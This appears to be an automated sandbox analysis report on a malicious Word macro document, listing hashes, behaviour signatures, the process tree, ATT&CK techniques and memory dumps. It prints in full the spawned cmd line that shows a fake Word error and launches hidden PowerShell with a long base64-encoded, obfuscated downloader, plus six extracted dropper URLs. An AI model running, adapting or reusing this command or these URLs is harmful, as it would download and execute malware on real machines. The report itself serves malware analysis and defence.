Analysis

  • max time kernel
    70s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    20-01-2021 18:52

General

  • Target

    SecuriteInfo.com.W97M.DownLoader.5071.839.19187.doc

  • Size

    144KB

  • MD5

    fc59bf0dc1610f692a98c99baec41a01

  • SHA1

    b58c2ea4490c574bfbf0eb31f4949cc95c43c46a

  • SHA256

    f1d61f4415e35f4fbff441b2dfb744721b4cbcfe2ae78a1f52bba612457d22be

  • SHA512

    4a08672f2450a202f2f0668fa73c12fb0b49e78f7a66fb87970151699263fc87299674025a61bec2e7e509960dcd8568301700a199e172ab9b054db1fad659b8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://obob.tv/content/rpKmYv/

exe.dropper

http://infoprocenter.com/wp-admin/MSInfo/

exe.dropper

http://miprimercamino.com/cgi-bin/AJ09AzChrK/

exe.dropper

http://mobilepro-tm.online/wp-admin/VGX/

exe.dropper

https://www.terrakulturegallery.com/wp-admin/ZNg6V7pv/

exe.dropper

http://bingdaofuzhu.com/wp-content/L/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W97M.DownLoader.5071.839.19187.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1784
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcALAAnAHMAeQBzAHQAZQAnACwAJwBkACcALAAnAGkAcgBFAGMAJwAsACcATQAuAGkAbwAuACcAKQAgACkAIAAgADsAIAAgAHMAdgAgACAAKAAiADQAIgArACIARQAzACIAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsANwB9AHsANgB9AHsAOAB9AHsAMQB9AHsAMwB9AHsANAB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBuAEEAZwBlAFIAJwAsACcASQBDACcALAAnAHMAWQBTACcALAAnAGUAJwAsACcAcABvAEkATgB0AG0AJwAsACcAQQAnACwAJwBFACcALAAnAFQAZQBNAC4ATgAnACwAJwBUAC4AcwBlAFIAdgAnACkAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACcAaQAnACsAKAAnAGwAJwArACcAZQBuAHQAbAAnACsAJwB5AEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQAQwBfADEAOAA1AHoANQA9ACQAVwAxADAAQQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgAwADQATgA7ACQASAA1ADkAVgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwAzAEgAJwApACkAOwAgACgAIAAgAEcASQAgACAAVgBBAFIASQBBAGIATABFADoAawA2AGkAKQAuAHYAYQBsAHUAZQA6ADoAIgBjAGAAUgBFAGAAQQBUAGUAZABgAEkAcgBlAGMAYABUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAFAAMQAnACsAJwBEACcAKQArACcAOQAnACsAJwBlADkAJwArACgAJwB1ADkAJwArACcAaQBjAFAAJwArACcAMQBGAGYAbgAnACsAJwBoAGQAJwApACsAKAAnAGEAJwArACcAawBjACcAKQArACcAUAAxACcAKQAuACIAcgBgAEUAcABMAEEAYABDAEUAIgAoACgAWwBDAGgAYQBSAF0AOQA5ACsAWwBDAGgAYQBSAF0AOAAwACsAWwBDAGgAYQBSAF0ANAA5ACkALABbAFMAdABSAEkATgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABCADUANgBXAD0AKAAoACcAWgAnACsAJwA3ADIAJwApACsAJwBTACcAKQA7ACAAIAAoAEcARQBUAC0ASQB0AGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAJwArACcAYQBiACcAKwAnAEwAZQA6ADQARQAzACcAKQApAC4AdgBhAGwAdQBlADoAOgAiAHMARQBjAFUAYABSAEkAVABZAHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAMQA4AFUAPQAoACcAVAAwACcAKwAnADAASAAnACkAOwAkAFUAMwB2ADYAbABjAG4AIAA9ACAAKAAoACcAQQAwACcAKwAnADUAJwApACsAJwBEACcAKQA7ACQAVwA5ADUARgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwA4AFQAJwApACkAOwAkAEEAMQBnAHEAcgBoAG0APQAkAEgATwBNAEUAKwAoACgAKAAnAE8AJwArACcAMgAwAEQAOQAnACkAKwAnAGUAJwArACgAJwA5AHUAOQAnACsAJwBpACcAKwAnAE8AMgAnACsAJwAwAEYAZgBuAGgAZAAnACsAJwBhAGsATwAyACcAKQArACcAMAAnACkALgAiAHIAZQBgAHAATABgAEEAQwBFACIAKAAoAFsAYwBIAGEAcgBdADcAOQArAFsAYwBIAGEAcgBdADUAMAArAFsAYwBIAGEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAGEAcgBdADkAMgApACkAKwAkAFUAMwB2ADYAbABjAG4AKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABMADYAMQBNAD0AKAAnAFAAJwArACgAJwA5ADcAJwArACcASQAnACkAKQA7ACQAQwBoAGYAegAzAGgAYwA9ACgAKAAnAF0AJwArACcAYQBuACcAKQArACgAJwB3AFsAMwAnACsAJwBzADoAJwApACsAKAAnAC8ALwBvAGIAbwBiACcAKwAnAC4AJwArACcAdAB2AC8AJwArACcAYwBvAG4AdABlACcAKQArACgAJwBuAHQALwAnACsAJwByACcAKQArACgAJwBwAEsAbQAnACsAJwBZAHYAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBhACcAKwAnAG4AdwBbADMAOgAvACcAKwAnAC8AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AJwArACcAcAByAG8AJwArACcAYwBlACcAKQArACcAbgB0ACcAKwAoACcAZQAnACsAJwByAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AYQAnACsAJwBkAG0AaQAnACkAKwAoACcAbgAvAE0AJwArACcAUwBJACcAKwAnAG4AZgBvAC8AJwArACcAQABdAGEAJwArACcAbgB3AFsAJwArACcAMwA6AC8ALwAnACkAKwAoACcAbQBpAHAAcgAnACsAJwBpAG0AZQByACcAKwAnAGMAJwArACcAYQBtAGkAbgBvAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAYwBnAGkAJwApACsAKAAnAC0AYgBpACcAKwAnAG4ALwAnACkAKwAnAEEASgAnACsAKAAnADAAOQAnACsAJwBBAHoAJwApACsAJwBDACcAKwAoACcAaAAnACsAJwByAEsALwAnACsAJwBAAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACgAJwA6AC8ALwBtACcAKwAnAG8AYgBpACcAKwAnAGwAZQBwAHIAbwAtAHQAbQAnACsAJwAuAG8AJwApACsAJwBuACcAKwAoACcAbABpAG4AZQAvAHcAcAAtAGEAJwArACcAZABtAGkAbgAnACsAJwAvACcAKwAnAFYAJwApACsAKAAnAEcAWAAnACsAJwAvAEAAJwApACsAJwBdAGEAJwArACcAbgB3ACcAKwAnAFsAJwArACgAJwAzAHMAOgAnACsAJwAvACcAKwAnAC8AdwAnACkAKwAoACcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAHIAJwApACsAJwBhAGsAJwArACgAJwB1AGwAdAB1AHIAJwArACcAZQBnACcAKQArACcAYQBsACcAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvAFoAJwApACsAJwBOACcAKwAnAGcANgAnACsAKAAnAFYANwBwAHYALwAnACsAJwBAAF0AYQBuACcAKwAnAHcAWwAzACcAKwAnADoALwAnACsAJwAvAGIAJwApACsAJwBpAG4AJwArACgAJwBnAGQAYQAnACsAJwBvAGYAdQB6ACcAKQArACgAJwBoAHUALgAnACsAJwBjAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjAG8AbgAnACsAJwB0AGUAbgAnACkAKwAnAHQALwAnACsAJwBMAC8AJwApAC4AIgByAEUAYABwAEwAYABBAGMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AJwArACcAdwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAbABgAEkAdAAiACgAJABGADgAXwBUACAAKwAgACQAQwBfADEAOAA1AHoANQAgACsAIAAkAE0AMQBfAEsAKQA7ACQARwAxADUARgA9ACgAJwBFADMAJwArACcAXwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASgA3AGsAbwBuAHIAMgAgAGkAbgAgACQAQwBoAGYAegAzAGgAYwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwB5AFMAdABlAG0ALgBuAGUAVAAuAFcARQBCAEMAbABpAEUATgBUACkALgAiAGQATwBgAFcAbgBMAGAAbwBhAGAARABmAEkAbABFACIAKAAkAEoANwBrAG8AbgByADIALAAgACQAQQAxAGcAcQByAGgAbQApADsAJABZADQAXwBZAD0AKAAnAEcAOQAnACsAJwA0AFIAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEEAMQBnAHEAcgBoAG0AKQAuACIAbABlAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA0ADcANwApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABBADEAZwBxAHIAaABtACwAKAAoACcAQwBvAG4AdAAnACsAJwByACcAKQArACgAJwBvAGwAJwArACcAXwAnACkAKwAnAFIAJwArACgAJwB1ACcAKwAnAG4ARAAnACkAKwAnAEwATAAnACkALgAiAFQAbwBgAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAEYAMQA2AEsAPQAoACgAJwBWADcAJwArACcAMQAnACkAKwAnAE8AJwApADsAYgByAGUAYQBrADsAJABYADQAMwBQAD0AKAAnAEQAOQAnACsAJwA5AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAF8ANgBUAD0AKAAnAFMAMQAnACsAJwAyAFkAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcALAAnAHMAeQBzAHQAZQAnACwAJwBkACcALAAnAGkAcgBFAGMAJwAsACcATQAuAGkAbwAuACcAKQAgACkAIAAgADsAIAAgAHMAdgAgACAAKAAiADQAIgArACIARQAzACIAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsANwB9AHsANgB9AHsAOAB9AHsAMQB9AHsAMwB9AHsANAB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBuAEEAZwBlAFIAJwAsACcASQBDACcALAAnAHMAWQBTACcALAAnAGUAJwAsACcAcABvAEkATgB0AG0AJwAsACcAQQAnACwAJwBFACcALAAnAFQAZQBNAC4ATgAnACwAJwBUAC4AcwBlAFIAdgAnACkAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACcAaQAnACsAKAAnAGwAJwArACcAZQBuAHQAbAAnACsAJwB5AEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQAQwBfADEAOAA1AHoANQA9ACQAVwAxADAAQQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgAwADQATgA7ACQASAA1ADkAVgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwAzAEgAJwApACkAOwAgACgAIAAgAEcASQAgACAAVgBBAFIASQBBAGIATABFADoAawA2AGkAKQAuAHYAYQBsAHUAZQA6ADoAIgBjAGAAUgBFAGAAQQBUAGUAZABgAEkAcgBlAGMAYABUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAFAAMQAnACsAJwBEACcAKQArACcAOQAnACsAJwBlADkAJwArACgAJwB1ADkAJwArACcAaQBjAFAAJwArACcAMQBGAGYAbgAnACsAJwBoAGQAJwApACsAKAAnAGEAJwArACcAawBjACcAKQArACcAUAAxACcAKQAuACIAcgBgAEUAcABMAEEAYABDAEUAIgAoACgAWwBDAGgAYQBSAF0AOQA5ACsAWwBDAGgAYQBSAF0AOAAwACsAWwBDAGgAYQBSAF0ANAA5ACkALABbAFMAdABSAEkATgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABCADUANgBXAD0AKAAoACcAWgAnACsAJwA3ADIAJwApACsAJwBTACcAKQA7ACAAIAAoAEcARQBUAC0ASQB0AGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAJwArACcAYQBiACcAKwAnAEwAZQA6ADQARQAzACcAKQApAC4AdgBhAGwAdQBlADoAOgAiAHMARQBjAFUAYABSAEkAVABZAHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAMQA4AFUAPQAoACcAVAAwACcAKwAnADAASAAnACkAOwAkAFUAMwB2ADYAbABjAG4AIAA9ACAAKAAoACcAQQAwACcAKwAnADUAJwApACsAJwBEACcAKQA7ACQAVwA5ADUARgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwA4AFQAJwApACkAOwAkAEEAMQBnAHEAcgBoAG0APQAkAEgATwBNAEUAKwAoACgAKAAnAE8AJwArACcAMgAwAEQAOQAnACkAKwAnAGUAJwArACgAJwA5AHUAOQAnACsAJwBpACcAKwAnAE8AMgAnACsAJwAwAEYAZgBuAGgAZAAnACsAJwBhAGsATwAyACcAKQArACcAMAAnACkALgAiAHIAZQBgAHAATABgAEEAQwBFACIAKAAoAFsAYwBIAGEAcgBdADcAOQArAFsAYwBIAGEAcgBdADUAMAArAFsAYwBIAGEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAGEAcgBdADkAMgApACkAKwAkAFUAMwB2ADYAbABjAG4AKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABMADYAMQBNAD0AKAAnAFAAJwArACgAJwA5ADcAJwArACcASQAnACkAKQA7ACQAQwBoAGYAegAzAGgAYwA9ACgAKAAnAF0AJwArACcAYQBuACcAKQArACgAJwB3AFsAMwAnACsAJwBzADoAJwApACsAKAAnAC8ALwBvAGIAbwBiACcAKwAnAC4AJwArACcAdAB2AC8AJwArACcAYwBvAG4AdABlACcAKQArACgAJwBuAHQALwAnACsAJwByACcAKQArACgAJwBwAEsAbQAnACsAJwBZAHYAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBhACcAKwAnAG4AdwBbADMAOgAvACcAKwAnAC8AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AJwArACcAcAByAG8AJwArACcAYwBlACcAKQArACcAbgB0ACcAKwAoACcAZQAnACsAJwByAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AYQAnACsAJwBkAG0AaQAnACkAKwAoACcAbgAvAE0AJwArACcAUwBJACcAKwAnAG4AZgBvAC8AJwArACcAQABdAGEAJwArACcAbgB3AFsAJwArACcAMwA6AC8ALwAnACkAKwAoACcAbQBpAHAAcgAnACsAJwBpAG0AZQByACcAKwAnAGMAJwArACcAYQBtAGkAbgBvAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAYwBnAGkAJwApACsAKAAnAC0AYgBpACcAKwAnAG4ALwAnACkAKwAnAEEASgAnACsAKAAnADAAOQAnACsAJwBBAHoAJwApACsAJwBDACcAKwAoACcAaAAnACsAJwByAEsALwAnACsAJwBAAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACgAJwA6AC8ALwBtACcAKwAnAG8AYgBpACcAKwAnAGwAZQBwAHIAbwAtAHQAbQAnACsAJwAuAG8AJwApACsAJwBuACcAKwAoACcAbABpAG4AZQAvAHcAcAAtAGEAJwArACcAZABtAGkAbgAnACsAJwAvACcAKwAnAFYAJwApACsAKAAnAEcAWAAnACsAJwAvAEAAJwApACsAJwBdAGEAJwArACcAbgB3ACcAKwAnAFsAJwArACgAJwAzAHMAOgAnACsAJwAvACcAKwAnAC8AdwAnACkAKwAoACcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAHIAJwApACsAJwBhAGsAJwArACgAJwB1AGwAdAB1AHIAJwArACcAZQBnACcAKQArACcAYQBsACcAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvAFoAJwApACsAJwBOACcAKwAnAGcANgAnACsAKAAnAFYANwBwAHYALwAnACsAJwBAAF0AYQBuACcAKwAnAHcAWwAzACcAKwAnADoALwAnACsAJwAvAGIAJwApACsAJwBpAG4AJwArACgAJwBnAGQAYQAnACsAJwBvAGYAdQB6ACcAKQArACgAJwBoAHUALgAnACsAJwBjAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjAG8AbgAnACsAJwB0AGUAbgAnACkAKwAnAHQALwAnACsAJwBMAC8AJwApAC4AIgByAEUAYABwAEwAYABBAGMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AJwArACcAdwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAbABgAEkAdAAiACgAJABGADgAXwBUACAAKwAgACQAQwBfADEAOAA1AHoANQAgACsAIAAkAE0AMQBfAEsAKQA7ACQARwAxADUARgA9ACgAJwBFADMAJwArACcAXwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASgA3AGsAbwBuAHIAMgAgAGkAbgAgACQAQwBoAGYAegAzAGgAYwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwB5AFMAdABlAG0ALgBuAGUAVAAuAFcARQBCAEMAbABpAEUATgBUACkALgAiAGQATwBgAFcAbgBMAGAAbwBhAGAARABmAEkAbABFACIAKAAkAEoANwBrAG8AbgByADIALAAgACQAQQAxAGcAcQByAGgAbQApADsAJABZADQAXwBZAD0AKAAnAEcAOQAnACsAJwA0AFIAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEEAMQBnAHEAcgBoAG0AKQAuACIAbABlAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA0ADcANwApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABBADEAZwBxAHIAaABtACwAKAAoACcAQwBvAG4AdAAnACsAJwByACcAKQArACgAJwBvAGwAJwArACcAXwAnACkAKwAnAFIAJwArACgAJwB1ACcAKwAnAG4ARAAnACkAKwAnAEwATAAnACkALgAiAFQAbwBgAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAEYAMQA2AEsAPQAoACgAJwBWADcAJwArACcAMQAnACkAKwAnAE8AJwApADsAYgByAGUAYQBrADsAJABYADQAMwBQAD0AKAAnAEQAOQAnACsAJwA5AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAF8ANgBUAD0AKAAnAFMAMQAnACsAJwAyAFkAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1592-11-0x0000000002470000-0x0000000002471000-memory.dmp
      Filesize

      4KB

    • memory/1592-10-0x000000001AC30000-0x000000001AC31000-memory.dmp
      Filesize

      4KB

    • memory/1592-16-0x000000001C4A0000-0x000000001C4A1000-memory.dmp
      Filesize

      4KB

    • memory/1592-15-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
      Filesize

      4KB

    • memory/1592-6-0x0000000000000000-mapping.dmp
    • memory/1592-7-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp
      Filesize

      8KB

    • memory/1592-14-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
      Filesize

      4KB

    • memory/1592-8-0x000007FEF52F0000-0x000007FEF5CDC000-memory.dmp
      Filesize

      9.9MB

    • memory/1592-9-0x0000000002220000-0x0000000002221000-memory.dmp
      Filesize

      4KB

    • memory/1592-13-0x000000001ABB4000-0x000000001ABB6000-memory.dmp
      Filesize

      8KB

    • memory/1592-12-0x000000001ABB0000-0x000000001ABB2000-memory.dmp
      Filesize

      8KB

    • memory/1628-5-0x0000000000000000-mapping.dmp
    • memory/1784-2-0x0000000072551000-0x0000000072554000-memory.dmp
      Filesize

      12KB

    • memory/1784-3-0x000000006FFD1000-0x000000006FFD3000-memory.dmp
      Filesize

      8KB

    • memory/1784-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB